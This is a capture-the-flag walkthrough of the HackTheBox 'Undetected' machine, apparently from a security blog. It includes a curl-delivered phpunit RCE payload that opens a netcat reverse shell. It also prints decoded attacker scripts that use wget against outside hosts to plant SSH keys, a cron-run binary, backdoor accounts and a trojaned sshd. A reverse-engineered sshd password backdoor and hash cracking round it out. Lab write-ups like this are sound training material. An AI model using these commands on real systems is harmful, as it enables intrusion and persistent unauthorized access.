HackTheBox: Undetected — WalkThrough
Today, we will be doing Undetected from HackTheBox which is labeled as an medium-level box that aims at teaching package misconfigurations, binary reverse engineering and following the path of an attacker. Without further ado, let’s connect to our HTB OpenVPN network and start hacking!!!
Enumerating Open Ports
Only two ports seem to be open, Port 22 and 80.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ nmap -p- --min-rate=10000 undetected.htb -vvv
Starting Nmap 7.91 ( <https://nmap.org> ) at 2022-07-24 17:25 +0545
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
11155/tcp filtered unknown no-response
61896/tcp filtered unknown no-response
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ nmap -p22,80 -sC -sV undetected.htb -vvv
Starting Nmap 7.91 ( <https://nmap.org> ) at 2022-07-25 09:50 +0545
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey:
| 3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeVJjvJKCD1dlTm7jo6sY5A6q2oWFakWfH/y6lkWB5eIeVxzQTT/XXyA2RW/Zegb7vbpculYjr6cPtbouTLqPkyi2Xzyk3Jz2jQHKi6qTcHIQL75tITJKPCag4tAAIvKpSCwT13B38TKd0KV2R8T59raCu83095p/GaLrdhwGUbuD0p+/GnN1jIsLs04V26rbPKLmMJLj7Dj/+yCo/CF88/4EQaFFC920sjln4FZ7FlVhv4mIwIb10nIsEgvsKBIGvvu4ZKKKU+Al6p8bYI50srY/plKu0RxZpKE6QGV17IC38q8CDsLWkmFr5emeIxHfvgUlYaAOruACcnru6azsJw69s2Kq/dKaz8K6PjRb9Ybf6/Ix8xGhfJ/gH6x0PhlxIKXD1M93XILJmgKRPJpzqrA6NZ+mtQwx0JFsgHHJno/TSrx00E6GPEtUPHcxOVZE0m0Y9rfd5Q8W6/eJN/Q3nMIywfHKZE1RUQOziGtud/jAOOApvrRHRO6l0riwQCK8=
| 256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBQjfhdRHFh+eC/2RtmQwDSGmf0psHnd2uqXFyN0zdiyxvF3WCQYaxOgerNZqC0RyQjm2hW0DN6/0oim3slS8dw=
| 256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFdnC6v7My/dt23PaoX7MGbuZ8/8KZh1O+xt4dDFvFQK
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry
Let’s check the website right away. It is an E-Commerce site primarily focused to sell jewelleries. I couln’t find any interesting endpoints after surfing the pages a while. Then, I came across the email contact@djewelry.htb
so I added djewelry.htb
to my /etc/hosts
file.
The djewelry.htb
is the same site that is opened with the IP alone. There’s nothing here as well except the Store
that takes us to store.djewelry.htb
which looks like the subdomain to place orders. But the pages are under-maintenance/migration at the moment.
Given that this website has concept of subdomains, it might have other virtual hosts as well hosted in its Apache Server. Let’s do a subdomain bruteforcing on djewelry.htb
.
┌──(kiran㉿kali)-[/usr/share/seclists/Discovery/DNS]
└─$ gobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: djewelry.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
2022/07/25 10:17:22 Starting gobuster in DNS enumeration mode
===============================================================
Found: store.djewelry.htb
===============================================================
2022/07/25 10:50:59 Finished
===============================================================
Nothing found except store.djewelry.htb
that we already knew. Seems like it is time for some directory bruteforcing.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <http://djewelry.htb/FUZZ> -e .php,.txt,.zip
/'___\\ /'___\\ /'___\\
/\\ \\__/ /\\ \\__/ __ __ /\\ \\__/
\\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\
\\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/
\\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\
\\/_/ \\/_/ \\/___/ \\/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : <http://djewelry.htb/FUZZ>
:: Wordlist : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .zip
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
images [Status: 301, Size: 313, Words: 20, Lines: 10]
icons [Status: 301, Size: 312, Words: 20, Lines: 10]
css [Status: 301, Size: 310, Words: 20, Lines: 10]
js [Status: 301, Size: 309, Words: 20, Lines: 10]
fonts [Status: 301, Size: 312, Words: 20, Lines: 10]
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <http://store.djewelry.htb/FUZZ> -e .php,.txt,.zip
/'___\\ /'___\\ /'___\\
/\\ \\__/ /\\ \\__/ __ __ /\\ \\__/
\\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\
\\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/
\\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\
\\/_/ \\/_/ \\/___/ \\/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : <http://store.djewelry.htb/FUZZ>
:: Wordlist : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .zip
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 200, Size: 6215, Words: 528, Lines: 196]
images [Status: 301, Size: 325, Words: 20, Lines: 10]
products.php [Status: 200, Size: 7447, Words: 329, Lines: 230]
login.php [Status: 200, Size: 4129, Words: 464, Lines: 123]
cart.php [Status: 200, Size: 4396, Words: 470, Lines: 135]
css [Status: 301, Size: 322, Words: 20, Lines: 10]
js [Status: 301, Size: 321, Words: 20, Lines: 10]
vendor [Status: 301, Size: 325, Words: 20, Lines: 10]**
fonts [Status: 301, Size: 324, Words: 20, Lines: 10]
/vendor
entry seems interesting. It’s a common convention to put files coming from various third party sources (the “vendors”) in a folder named that way. We can clearly see all the PHP packages that are installed in this server and we can get an exhaustive list inside. composer/installed.json
file
Let’s use some string operations to filter out the package names and their corresponding versions so that we can poke at each of them with a hope of finding a vulnerability.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ cat installed.json | jq -c '.[] | [.name, .version]'
["doctrine/instantiator","1.4.0"]
["myclabs/deep-copy","1.10.2"]
["phpdocumentor/reflection-common","2.2.0"]
["phpdocumentor/reflection-docblock","5.2.2"]
["phpdocumentor/type-resolver","1.4.0"]
["phpspec/prophecy","v1.10.3"]
["phpunit/php-code-coverage","4.0.8"]
["phpunit/php-file-iterator","1.4.5"]
["phpunit/php-text-template","1.2.1"]
["phpunit/php-timer","1.0.9"]
["phpunit/php-token-stream","2.0.2"]
["phpunit/phpunit","5.6.2"]
["phpunit/phpunit-mock-objects","3.4.4"]
["sebastian/code-unit-reverse-lookup","1.0.2"]
["sebastian/comparator","1.2.4"]
["sebastian/diff","1.4.3"]
["sebastian/environment","2.0.0"]
["sebastian/exporter","1.2.2"]
["sebastian/global-state","1.1.1"]
["sebastian/object-enumerator","1.0.0"]
["sebastian/recursion-context","1.0.5"]
["sebastian/resource-operations","1.0.0"]
["sebastian/version","2.0.1"]
["symfony/polyfill-ctype","v1.23.0"]
["symfony/yaml","v3.4.47"]
["webmozart/assert","1.10.0"]
After a bit of googling, I came over this post about phpunit v5.6.2 which is vulnerable to Remote Code Execution on the server. Without further ado, I fired up the reverse shell payload using this exploit as below and listened using netcat. Luckily, it worked on the first try and gave the shell as www-data
user.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ curl -XPOST --data '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 9001 >/tmp/f");' <http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php>
www-data@production:/home$ cat /etc/passwd | grep sh | grep -v ssh
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash
Analyzing the /etc/passwd
file, two users other than root are present i.e, steven
and steven1
. One thing to notice is that both have the same UID (1000) which is kinda weird. Looks like I have no permission to access this user’s home directory so its time for horizontal privilege escalation. After checking the files that are currently owned by the www-data
user, something that sticks out is /var/backups/info
.
www-data@production:/tmp$ find / -user www-data -ls 2>/dev/null | grep -v "/var/www" | grep -v "/proc"
131761 316 -rw-r--r-- 1 www-data www-data 322453 Jul 26 11:12 /tmp/out
131758 0 prw-r--r-- 1 www-data www-data 0 Jul 26 15:11 /tmp/f
131760 304 -rwxr-xr-x 1 www-data www-data 308257 Jul 26 09:22 /tmp/linpease.sh
141800 4 drwx------ 2 www-data www-data 4096 Jul 26 09:13 /tmp/tmux-33
131759 0 srw-rw---- 1 www-data www-data 0 Jul 26 09:13 /tmp/tmux-33/default
4 0 crw--w---- 1 www-data tty 136, 1 Jul 26 15:11 /dev/pts/1
3 0 crw--w---- 1 www-data tty 136, 0 Jul 26 09:16 /dev/pts/0
15193 4 drwxr-xr-x 2 www-data www-data 4096 Feb 8 19:59 /var/cache/apache2/mod_cache_disk
17565 28 -r-x--x--x 1 www-data www-data 27296 May 14 2021 /var/backups/info
697 0 drwx------ 2 www-data www-data 40 Jul 26 11:04 /run/screen/S-www-data
5 0 drwxr-xr-x 2 www-data root 40 Jul 26 06:38 /run/lock/apache2
It seems like a binary file which need to be reversed.
www-data@production:/var/backups$ file info
info: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0dc004db7476356e9ed477835e583c68f1d2493a, for GNU/Linux 3.2.0, not stripped
www-data@production:/var/backups$ ./info
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[-] substring 'ffff' not found in dmesg
Looking inside the file using strings info
gave us a hex-encoded blob that looks something of value, let’s decode that.
[-] klogctl(SYSLOG_ACTION_READ_ALL)
Freeing SMP
[-] substring '%s' not found in dmesg
ffff
/bin/bash
776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f64203735
35202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b7379
7374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441
436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022
243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f
75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b
[-] fork()
/etc/shadow
[.] checking if we got root
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab;
awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\\$6\\$zS7ykHfFMg3aYht4\\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >>
/etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _;
do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
The script:
- Downloads an
authorized_keys
file fromtempfiles.xyz
and saves it for root as an SSH backdoor. - Downloads a file,
.main
and saves it in/var/lib/
, sets it executable, and adds it to the systemcrontab
file to be run every minute from 3am – 4am each day. - Finds each user in
/etc/password
that has the shell/bin/bash
and a UID 1000 or greater and writes a line to/etc/shadow
based on it. - Finds each user in
/etc/password
with the same criteria again and this time writes their username, group, home folder, and shell to a file,users.txt
. - It loops over the rows in
users.txt
creating rows in/etc/passwd
for them with the “1” appended to their username, but keeping the same UID. - Removes the
users.txt
file.
It’s time to crack the hash for this steven1
user. Loaded the hash on hashcat
and using the popular wordlist rockyou.txt
gave us the password ihatehackers
.
└─# cat hash
steven1:$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:18813:0:99999:7:::
┌──(root💀kali)-[/home/…/Documents/boxes/htb/undetected]
└─# hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt --force
hashcat (v6.1.1) starting...
$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:ihatehackers
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwb...Q2T9n/
Time.Started.....: Wed Jul 27 10:20:56 2022, (2 mins, 30 secs)
Time.Estimated...: Wed Jul 27 10:23:26 2022, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 594 H/s (10.18ms) @ Accel:64 Loops:128 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 89088/14344387 (0.62%)
Rejected.........: 0/89088 (0.00%)
Restore.Point....: 88832/14344387 (0.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: joker4 -> hameed
Started: Wed Jul 27 10:19:37 2022
Stopped: Wed Jul 27 10:23:29 2022
After I login as steven1
user, I got steven
‘s shell. This might be due the face that both user have same UID. Now I can access the userflag, it’s time for vertical privilege escalation. So, ran linpeas.sh and found interesting file /var/mail/steven
which is actually an email from root@production
to steven.
steven@production:~$ cat /var/mail/steven
From root@production Sun, 25 Jul 2021 10:31:12 GMT
----<SNIP>---
To: steven@production
From: root@production
Subject: Investigations
Hi Steven.
We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.
Thanks,
sysadmin
Since this box is named undetected
, it means that the attacker steps are not detected still. From this mail, one can suspect that something has been done with the Apache
service and its files. After looking for a lot of time, I couldn’t find anything that sticks out and start searching for those files that were modified during the creation of /var/backups/info
file. And found one module ./mods-available/reader.load
that was modified at 17 May.
steven@production:/etc/apache2$ ls -l /var/backups/info
-r-x--x--x 1 www-data www-data 27296 May 14 2021 /var/backups/info
steven@production:/etc/apache2$ find . -type f -newermt 2021-05-10 ! -newermt 2021-05-30 -ls
50834 4 -rw-r--r-- 1 root root 69 May 17 2021 ./mods-available/reader.load
steven@production:/etc/apache2$ cat ./mods-available/reader.load
LoadModule reader_module /usr/lib/apache2/modules/mod_reader.so
steven@production:/etc/apache2$ file /usr/lib/apache2/modules/mod_reader.so
/usr/lib/apache2/modules/mod_reader.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=e26fdc45e4b6561d29af8306c2be74f35ab140bb, with debug_info, not stripped
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ strings mod_reader.so | less
----<SNIP>---
/bin/bash
mod_reader.c
d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk
;*3$"
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
42PA
GCC: (Debian 10.2.1-6) 10.2.1 20210110
w#%
----<SNIP>---
Again using strings on this file gave one base64-encoded blob which when decoded gave something interesting. The SSH daemon binary /usr/sbin/sshd
has been modified. So let’s export this binary to our machine and fire this up with ghidra
.
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ echo d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk | base64 -d
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
Reversing the file gave us overwhelming number of functions to look at. Looking at the auth
folder, auth_password
looks something that attacker might have taken advantage over to insert the payload.
This is the C
code for auth_password
function.
/* WARNING: Could not reconcile some variable overlaps */
int auth_password(ssh *ssh,char *password)
{
Authctxt *ctxt;
passwd *ppVar1;
int iVar2;
uint uVar3;
byte *pbVar4;
byte *pbVar5;
size_t sVar6;
byte bVar7;
int iVar8;
long in_FS_OFFSET;
char backdoor [31];
byte local_39 [9];
long local_30;
bVar7 = 0xd6;
ctxt = (Authctxt *)ssh->authctxt;
local_30 = *(long *)(in_FS_OFFSET + 0x28);
backdoor._28_2_ = 0xa9f4;
ppVar1 = ctxt->pw;
iVar8 = ctxt->valid;
backdoor._24_4_ = 0xbcf0b5e3;
backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
backdoor[30] = -0x5b;
backdoor._0_4_ = 0xf0e7abd6;
backdoor._4_4_ = 0xa4b3a3f3;
backdoor._8_4_ = 0xf7bbfdc8;
backdoor._12_4_ = 0xfdb3d6e7;
pbVar4 = (byte *)backdoor;
while( true ) {
pbVar5 = pbVar4 + 1;
*pbVar4 = bVar7 ^ 0x96;
if (pbVar5 == local_39) break;
bVar7 = *pbVar5;
pbVar4 = pbVar5;
}
iVar2 = strcmp(password,backdoor);
uVar3 = 1;
if (iVar2 != 0) {
sVar6 = strlen(password);
uVar3 = 0;
if (sVar6 < 0x401) {
if ((ppVar1->pw_uid == 0) && (options.permit_root_login != 3)) {
iVar8 = 0;
}
if ((*password != '\\0') ||
(uVar3 = options.permit_empty_passwd, options.permit_empty_passwd != 0)) {
if (auth_password::expire_checked == 0) {
auth_password::expire_checked = 1;
iVar2 = auth_shadow_pwexpired(ctxt);
if (iVar2 != 0) {
ctxt->force_pwchange = 1;
}
}
iVar2 = sys_auth_passwd(ssh,password);
if (ctxt->force_pwchange != 0) {
auth_restrict_session(ssh);
}
uVar3 = (uint)(iVar2 != 0 && iVar8 != 0);
}
}
}
if (local_30 == *(long *)(in_FS_OFFSET + 0x28)) {
return uVar3;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
Looks like we need to find out the backdoor
string from this code. This script below serves the purpose well for extracting the password
.
import binascii
backdoor_str = 'a5a9f4bcf0b5e3b2d6f4a0fda0b3d6fdb3d6e7f7bbfdc8a4b3a3f3f0e7abd6'
backdoor = binascii.unhexlify(backdoor_str)[::-1]
print(f'Backdoor is: {backdoor}')
print(''.join([chr(b ^ 0x96) for b in backdoor]))
#--------------Reference: 0xdf.gitlab.io---------------#
After we get the root password utilizing this script, one can SSH into the server as root user and grab the system
flag.
Such a nice box. Happy Hacking!!!
Founder of cybersecnerds.com. Cybersecurity professional with 3+ years experience in offensive web security, cloud security and building systems.
I am a Linux envagelist and highly interested in source-code auditing. You will find me reading InfoSec blogs most of the time.